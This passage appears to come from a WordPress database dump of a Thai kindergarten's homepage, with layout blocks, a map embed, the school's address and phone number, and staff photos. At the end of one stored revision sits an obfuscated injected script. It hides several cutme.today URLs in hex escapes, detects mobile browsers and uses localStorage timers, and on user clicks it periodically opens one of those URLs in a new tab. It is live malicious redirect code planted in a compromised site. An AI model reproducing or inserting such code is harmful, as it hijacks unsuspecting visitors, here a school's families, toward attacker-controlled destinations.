{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 15:38:49','2025-06-27 08:38:49','',19,'http://watprato.ssk.in.th/?p=583',0,'revision','',0),
(584,1,'2025-06-27 15:39:24','2025-06-27 08:39:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 